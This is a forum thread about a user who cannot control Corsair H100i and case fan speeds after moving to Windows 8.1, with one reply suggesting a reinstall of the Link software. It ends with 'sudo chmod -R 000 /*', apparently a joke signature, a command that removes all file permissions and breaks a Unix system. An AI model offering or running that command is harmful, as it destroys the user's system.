so disappointed pls help me

Tech Lover

hi. its been over a year now, but since last month, that i changed the position of my system right next to me, its been so bugging.

problem is i have Corsair H100i, Maximus VI Hero and 2 case fans on coolermaster 690 II advanced.

now, the corsair link, used to work fine until i installed this windows 8.1. its shit for me at least. i have connected the fans to the cooler block itself and still i cant change speed of fans.

i have done everything i can , asking people on corsair forums and i cant do anything. i have used fanspeed, i have checked bios i have done everything i can but still cant change speeds.

its so annoying, the case fans are not shitty fans either, they are cooler master fans that come with Hyper 212+, hence, these decent cpu cooler fans. i used to control their speeds on windows 7 without any problem.

i have even tried to connect fans to different places, h100i connected to block itself, h100i fans connected to motherboard pwm connectors. but i cant control speed of either h100i fans nor the speeds of case fans which are currently connected to mobo pwm connectors.

pls help me. these get so loud its a headache. i dont want to get external fan controller mainly because i could literally control speeds before, why the hell not now?

i will be so grateful for ur help im so tired of this noise now :(

The first thing I'd try would be reinstalling the link software.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
